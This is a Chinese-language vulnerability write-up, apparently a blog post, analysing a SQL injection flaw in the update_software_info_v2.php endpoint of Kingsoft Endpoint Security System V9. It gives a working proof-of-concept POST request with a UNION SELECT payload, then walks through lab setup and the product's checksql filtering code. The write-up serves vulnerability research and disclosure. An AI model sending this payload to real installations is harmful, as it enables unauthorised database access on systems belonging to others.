金山终端安全系统V9.0 update_software_info_v2.php处SQL注入漏洞分析

前言

免责声明：请勿利用文章内的相关技术从事非法测试，由于传播、利用此文所提供的信息或者工具而造成的任何直接或者间接的后果及损失，均由使用者本人负责，所产生的一切不良后果与文章作者无关。该文章仅供学习用途使用！！！

一、漏洞描述

近期，长亭科技监测到猎鹰安全（原金山安全）官方发布了新版本修复了一处SQL注入漏洞。金山终端安全系统是一款为企业提供终端防护的安全产品，针对恶意软件、病毒和外部攻击提供防范措施，帮助维护企业数据和网络。

该漏洞是由于金山终端安全系统未对用户的输入进行有效地过滤，直接将其拼接进了SQL查询语句中，导致系统出现SQL注入漏洞。

二、影响版本

金山终端安全系统<V9.SP1.E1008

三、POC

POST /inter/update_software_info_v2.php HTTP/1.1
Host: ip:port
Content-Type: application/x-www-form-urlencoded
 
type=-1+UNION+SELECT+1,user(),3,4,5,6,7,8--&key=&pageCount=0&curPage=

四、漏洞原理分析

1.首先官网下载试用安装包。

下载网址：http://duba-011.duba.net/netversion/Package/SecManage.iso

2.解压安装居然挑环境，只能在windows sever上进行安装（自己使用的是windows sever 2016）

下载后是iso，对其解压之后SecManage.exe就是管理中心的安装包，在对应系统上安装就可以了。

3.安装成功之后登陆界面如下，直接访问127.0.0.1:6868
也可以直接双击金山终端安全系统V9控制台（成功安装后桌面会出现）也可以进入登陆界面。

4.安装过程中可以看到文件释放的位置C:\SecManage下面。
5.安装好，也可以登录访问，接下来就是验证漏洞是否存在。
直接使用poc打（因此环境是在本机虚拟机windows sever 2016上搭建的，查看虚拟机ip地址在本机上访问）流量直接代理到Yakit上。

发现无论怎么尝试都是返回数据格式错误。去确认下版本是V9.SP1.E1001 没错，版本是包含在漏洞版本之内的。
6.接下来直接找到C:\SecManage\Console\inter\update_software_info_v2.php出现漏洞的文件。

出现问题的代码就在下面， 当$postdata['type'] 是否不为 null 且不为空字符串。如果满足条件，它会将 $postdata['type']的值赋给$id 变量，然后将"and type=$id"添加到 SQL 查询条件的 $where 中。而下面sql语句就是直接将$where拼接而成，猜测就是这里没有过滤导致可以触发sql注入漏洞。

我们再回到这段代码开头部分，首先定义了一个 $paramArr 数组，其中包含了需要检查的参数名。然后，它使用 checkParam 函数来检查这些参数。在检查后，如果 $check 数组中存在 nResult 键，那么它会意味着参数检查失败，会设置一个包含错误信息的 JSON 响应，并退出脚本。看到了返回数据格式错误字段。

7.全局搜索checkParam函数，找到路径C:\SecManage\Console\inter\common\checksql.php文件。

checkParam函数，它用于检查传递给它的参数数组 $postData 中是否包含指定的键，以及一些其他的验证。checkParamFull 函数用于检查参数的完整性，它会遍$keyData 数组中指定的键，并检查是否都存在$postData 数组中。如果有任何一个键缺失，它将返回 false，否则返回 true。如果参数不完整，它还会记录错误日志。

接下来，它调用 checksql 函数来检查 $postData 数组中的值是否包含SQL注入，如果检查到SQL注入，它返回一个包含 “nResult” 键值为25的数组，表示SQL注入检测到。

接下来返回到代码的开头：

首先，它检查传入的参数 $param 是否为数组或对象。如果是数组或对象，它会递归调用 checksql 函数，以确保所有数组元素或对象属性都经过相同的检查。

接下来，它检查是否存在名为"checkWhiteList.php"的文件，并在该文件中定义了$checkWhiteList 变量。如果文件存在并且$param的值在白名单中，它会执行一系列操作，包括添加反斜杠转义、删除一些特殊字符、处理换行符、将HTML标签转义等。这些操作旨在防止一些常见的攻击。

然后，它使用正则表达式检查$param是否包含潜在的SQL注入攻击字符串，如果匹配到，返回 true。则提示错误信息。

所以到这可以从代码中猜测，存在漏洞的版本应该是没有对参数做单独的sql注入检测或者检测注入的方式不对，导致存在漏洞，而现在官网下载的版本，虽然在受影响范围内，但是已经修复了该漏洞。当去掉这里的检测是可以触发该漏洞的。

参考链接：

https://blog.csdn.net/weixin_48539059/article/details/134823724
https://mp.weixin.qq.com/s/Dd6BZglv6OYXveJOAvoawA